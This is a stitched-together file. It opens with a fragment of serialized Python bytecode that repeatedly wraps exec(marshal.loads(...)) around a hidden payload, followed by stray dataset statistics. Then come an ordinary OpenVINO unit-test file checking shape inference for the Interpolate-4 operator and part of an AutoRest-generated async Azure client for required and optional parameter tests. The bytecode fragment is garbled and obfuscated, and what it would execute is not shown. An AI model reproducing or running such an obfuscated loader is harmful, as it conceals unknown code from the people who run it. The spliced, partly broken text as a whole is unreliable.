05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marsha
l\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 37,149.4
| 185,645
| 0.762941
| 41,481
| 185,747
| 3.415901
| 0.021745
| 0.520075
| 0.522933
| 0.518466
| 0.947479
| 0.94124
| 0.935326
| 0.929468
| 0.925573
| 0.921712
| 0
| 0.390036
| 0.000705
| 185,747
| 5
| 185,645
| 37,149.4
| 0.373341
| 0.000431
| 0
| 0
| 0
| 4.5
| 0.921013
| 0.900578
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 21
|
e89761d00c3880fb29027e6065152c87d2140a0d
| 17,234
|
py
|
Python
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
|
monroid/openvino
|
8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6
|
[
"Apache-2.0"
] | 2,406
|
2020-04-22T15:47:54.000Z
|
2022-03-31T10:27:37.000Z
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 4,948
|
2020-04-22T15:12:39.000Z
|
2022-03-31T18:45:42.000Z
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 991
|
2020-04-23T18:21:09.000Z
|
2022-03-31T18:40:57.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from generator import generator, generate
from extensions.ops.interpolate import Interpolate
from mo.front.common.partial_infer.utils import int64_array
from mo.graph.graph import Node
from unit_tests.utils.graph import build_graph
# Node-attribute map for a test graph feeding Interpolate-4 its three
# mandatory inputs (data, sizes, scales); the optional 'axes' input is omitted.
# 'shape'/'value' are left as None placeholders — each test overrides them
# through build_graph(update_attributes=...).
graph_node_attrs_without_axes = {
    'input': {'type': 'Parameter', 'kind': 'op'},
    'input_data': {'kind': 'data', 'shape': None, 'value': None},
    'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
    'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
    'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
    'scales_data': {'kind': 'data', 'shape': None, 'value': None},
    # The Interpolate op under test; defaults to 'sizes' shape calculation —
    # individual tests patch pads and shape_calculation_mode as needed.
    'interpolate': {
        'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
        'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
        'nearest_mode': 'round_prefer_floor', 'antialias': 0,
    },
    'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
    'op_output': {'kind': 'op', 'op': 'Result'},
}
# Edge list matching graph_node_attrs_without_axes. The 'in' attribute is the
# input-port index on the Interpolate node: 0 = data, 1 = sizes, 2 = scales.
graph_edges_without_axes = [
    ('input', 'input_data'),
    ('sizes', 'sizes_data'),
    ('scales', 'scales_data'),
    ('input_data', 'interpolate', {'in': 0}),
    ('sizes_data', 'interpolate', {'in': 1}),
    ('scales_data', 'interpolate', {'in': 2}),
    ('interpolate', 'interpolate_data'),
    ('interpolate_data', 'op_output'),
]
# Node-attribute map for the full Interpolate-4 test graph, including the
# optional fourth 'axes' input in addition to data, sizes and scales.
# 'shape'/'value' are None placeholders filled per test via update_attributes.
graph_nodes_attrs = {
    'input': {'type': 'Parameter', 'kind': 'op'},
    'input_data': {'kind': 'data', 'shape': None, 'value': None},
    'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
    'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
    'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
    'scales_data': {'kind': 'data', 'shape': None, 'value': None},
    'axes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
    'axes_data': {'kind': 'data', 'shape': None, 'value': None},
    # The Interpolate op under test; defaults to 'sizes' shape calculation —
    # individual tests patch pads and shape_calculation_mode as needed.
    'interpolate': {
        'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
        'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
        'nearest_mode': 'round_prefer_floor', 'antialias': 0,
    },
    'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
    'op_output': {'kind': 'op', 'op': 'Result'},
}
# Edge list matching graph_nodes_attrs. The 'in' attribute is the input-port
# index on the Interpolate node: 0 = data, 1 = sizes, 2 = scales, 3 = axes.
graph_edges = [
    ('input', 'input_data'),
    ('sizes', 'sizes_data'),
    ('scales', 'scales_data'),
    ('axes', 'axes_data'),
    ('input_data', 'interpolate', {'in': 0}),
    ('sizes_data', 'interpolate', {'in': 1}),
    ('scales_data', 'interpolate', {'in': 2}),
    ('axes_data', 'interpolate', {'in': 3}),
    ('interpolate', 'interpolate_data'),
    ('interpolate_data', 'op_output'),
]
@generator
class TestInterpolateOp(unittest.TestCase):
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4])
])
def test_interpolate4_using_sizes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
    """Shape inference of Interpolate-4 in 'sizes' mode with an explicit 'axes' input.

    Builds the fixture graph, runs Interpolate.infer on the 'interpolate'
    node and checks the inferred output shape against output_shape.
    """
    updates = {'input_data': {'shape': input_shape},
               'interpolate': {'pads_begin': int64_array(pads_begin),
                               'pads_end': int64_array(pads_end)}}
    # Populate the 'sizes', 'scales' and 'axes' constants together with their
    # corresponding data nodes; each node gets a freshly converted array.
    for base, raw, convert in (('sizes', sizes, int64_array),
                               ('scales', scales, np.array),
                               ('axes', axes, int64_array)):
        for name in (base, base + '_data'):
            arr = convert(raw)
            updates[name] = {'shape': arr.shape, 'value': arr}
    graph = build_graph(nodes_attrs=graph_nodes_attrs,
                        edges=graph_edges,
                        update_attributes=updates)
    node = Node(graph, 'interpolate')
    Interpolate(graph=graph, attrs=node.attrs()).infer(node)
    inferred = graph.node['interpolate_data']['shape']
    msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}, expected_shape={}, actual_shape={}"
    self.assertTrue(np.array_equal(inferred, int64_array(output_shape)),
                    msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape, inferred))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 1 / 3], [0, 2, 4, 6]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 0.3333333], [0, 2, 4, 6]),
])
def test_interpolate4_using_scales(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
    """Shape inference of Interpolate-4 in 'scales' mode with an explicit 'axes' input.

    Same fixture as the 'sizes' test, but the node is switched to
    shape_calculation_mode='scales' before inference.
    """
    updates = {'input_data': {'shape': input_shape},
               'interpolate': {'pads_begin': int64_array(pads_begin),
                               'pads_end': int64_array(pads_end),
                               'shape_calculation_mode': 'scales'}}
    # Populate the 'sizes', 'scales' and 'axes' constants together with their
    # corresponding data nodes; each node gets a freshly converted array.
    for base, raw, convert in (('sizes', sizes, int64_array),
                               ('scales', scales, np.array),
                               ('axes', axes, int64_array)):
        for name in (base, base + '_data'):
            arr = convert(raw)
            updates[name] = {'shape': arr.shape, 'value': arr}
    graph = build_graph(nodes_attrs=graph_nodes_attrs,
                        edges=graph_edges,
                        update_attributes=updates)
    node = Node(graph, 'interpolate')
    Interpolate(graph=graph, attrs=node.attrs()).infer(node)
    inferred = graph.node['interpolate_data']['shape']
    msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}, expected_shape={}, actual_shape={}"
    self.assertTrue(np.array_equal(inferred, int64_array(output_shape)),
                    msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape, inferred))
# Each case: (pads_begin, pads_end, input_shape, output_shape, sizes, scales).
# Without an 'axes' input, sizes/scales must cover every dimension.
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
            ([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
             [8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
            ([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
             [56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
            ([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
             [20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
            ([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
             [60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
            ([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
             [100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
            ([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
            ([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
            ([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
            ([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
            ([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
             [60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
            ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
             [60, 22, 430, 500, 345, 349, 1],
             [60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
            ])
def test_interpolate4_using_sizes_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
                                               scales):
    # Check Interpolate-4 shape inference in 'sizes' mode when the optional
    # 'axes' input is absent (axes-free graph fixtures are used).
    graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
                        edges=graph_edges_without_axes,
                        update_attributes={
                            'input_data': {'shape': input_shape},
                            'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
                            'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
                            'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
                            'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
                            'interpolate': {'pads_begin': int64_array(pads_begin),
                                            'pads_end': int64_array(pads_end),
                                            'shape_calculation_mode': 'sizes'}
                        })
    node = Node(graph, 'interpolate')
    tested_class = Interpolate(graph=graph, attrs=node.attrs())
    # Run shape inference; it stores the result on the output data node.
    tested_class.infer(node)
    msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
          " expected_shape={}, actual_shape={}"
    self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
                    msg.format(sizes, scales, pads_begin, pads_end, output_shape,
                               graph.node['interpolate_data']['shape']))
# Each case: (pads_begin, pads_end, input_shape, output_shape, sizes, scales).
# Same data as the 'sizes' variant plus one case with a truncated-float scale.
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
            ([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
             [8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
            ([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
             [56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
            ([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
             [20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
            ([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
             [60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
            ([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
             [100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
            ([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
            ([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
            ([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
            ([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
            ([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
             [60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
            ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
             [60, 22, 430, 500, 345, 349, 1],
             [60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
            ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
             [60, 22, 430, 500, 345, 349, 1],
             [60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 0.3333333]),
            ])
def test_interpolate4_using_scales_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
                                                scales):
    # Check Interpolate-4 shape inference in 'scales' mode when the optional
    # 'axes' input is absent (axes-free graph fixtures are used).
    graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
                        edges=graph_edges_without_axes,
                        update_attributes={
                            'input_data': {'shape': input_shape},
                            'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
                            'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
                            'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
                            'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
                            'interpolate': {'pads_begin': int64_array(pads_begin),
                                            'pads_end': int64_array(pads_end),
                                            'shape_calculation_mode': 'scales'}
                        })
    node = Node(graph, 'interpolate')
    tested_class = Interpolate(graph=graph, attrs=node.attrs())
    # Run shape inference; it stores the result on the output data node.
    tested_class.infer(node)
    msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
          " expected_shape={}, actual_shape={}"
    self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
                    msg.format(sizes, scales, pads_begin, pads_end, output_shape,
                               graph.node['interpolate_data']['shape']))
| 64.30597
| 116
| 0.459267
| 2,356
| 17,234
| 3.252122
| 0.059423
| 0.016445
| 0.010963
| 0.026103
| 0.945184
| 0.925346
| 0.925346
| 0.912555
| 0.908249
| 0.897155
| 0
| 0.22483
| 0.325113
| 17,234
| 267
| 117
| 64.546816
| 0.433927
| 0.004468
| 0
| 0.861925
| 1
| 0
| 0.147487
| 0.00991
| 0
| 0
| 0
| 0
| 0.016736
| 1
| 0.016736
| false
| 0
| 0.029289
| 0
| 0.050209
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e8abc6a230c9824f45db671402a65233b9186aef
| 53,791
|
py
|
Python
|
test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/aio/operations/_operations.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/aio/operations/_operations.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/aio/operations/_operations.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | 1
|
2022-03-28T08:58:03.000Z
|
2022-03-28T08:58:03.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, IO, List, Optional, TypeVar
import warnings
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ...operations._operations import (
build_explicit_post_optional_array_header_request,
build_explicit_post_optional_array_parameter_request,
build_explicit_post_optional_array_property_request,
build_explicit_post_optional_class_parameter_request,
build_explicit_post_optional_class_property_request,
build_explicit_post_optional_integer_header_request,
build_explicit_post_optional_integer_parameter_request,
build_explicit_post_optional_integer_property_request,
build_explicit_post_optional_string_header_request,
build_explicit_post_optional_string_parameter_request,
build_explicit_post_optional_string_property_request,
build_explicit_post_required_array_header_request,
build_explicit_post_required_array_parameter_request,
build_explicit_post_required_array_property_request,
build_explicit_post_required_class_parameter_request,
build_explicit_post_required_class_property_request,
build_explicit_post_required_integer_header_request,
build_explicit_post_required_integer_parameter_request,
build_explicit_post_required_integer_property_request,
build_explicit_post_required_string_header_request,
build_explicit_post_required_string_parameter_request,
build_explicit_post_required_string_property_request,
build_explicit_put_optional_binary_body_request,
build_explicit_put_required_binary_body_request,
build_implicit_get_optional_global_query_request,
build_implicit_get_required_global_path_request,
build_implicit_get_required_global_query_request,
build_implicit_get_required_path_request,
build_implicit_put_optional_binary_body_request,
build_implicit_put_optional_body_request,
build_implicit_put_optional_header_request,
build_implicit_put_optional_query_request,
)
# Generic result type for the optional per-call response hook ('cls' kwarg).
T = TypeVar("T")
# Version-tolerant generated code models JSON request/response bodies as Any.
JSONType = Any
# Signature of the optional 'cls' callback every operation pops from kwargs;
# on success it is invoked as cls(pipeline_response, deserialized, headers)
# (here always cls(pipeline_response, None, {})).
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
# NOTE(review): AutoRest-generated code (see file header) — edits here are
# lost on regeneration; documentation only.
class ImplicitOperations:
    """ImplicitOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    def __init__(self, client, config, serializer, deserializer) -> None:
        # Shared plumbing injected by the generated service client.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace_async
    async def get_required_path(self, path_parameter: str, **kwargs: Any) -> None:
        """Test implicitly required path parameter.

        :param path_parameter:
        :type path_parameter: str
        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        # Map HTTP status codes to azure-core exception types; callers may
        # extend/override entries via the 'error_map' kwarg.
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        request = build_implicit_get_required_path_request(
            path_parameter=path_parameter,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            # Optional response hook: (pipeline_response, deserialized, headers).
            return cls(pipeline_response, None, {})

    get_required_path.metadata = {"url": "/reqopt/implicit/required/path/{pathParameter}"}  # type: ignore

    @distributed_trace_async
    async def put_optional_query(self, *, query_parameter: Optional[str] = None, **kwargs: Any) -> None:
        """Test implicitly optional query parameter.

        :keyword query_parameter:
        :paramtype query_parameter: str
        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        request = build_implicit_put_optional_query_request(
            query_parameter=query_parameter,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            return cls(pipeline_response, None, {})

    put_optional_query.metadata = {"url": "/reqopt/implicit/optional/query"}  # type: ignore

    @distributed_trace_async
    async def put_optional_header(self, *, query_parameter: Optional[str] = None, **kwargs: Any) -> None:
        """Test implicitly optional header parameter.

        :keyword query_parameter:
        :paramtype query_parameter: str
        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        # NOTE(review): a *header* operation whose parameter is named
        # 'query_parameter' — presumably faithful to the service definition;
        # confirm against the swagger before renaming.
        request = build_implicit_put_optional_header_request(
            query_parameter=query_parameter,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

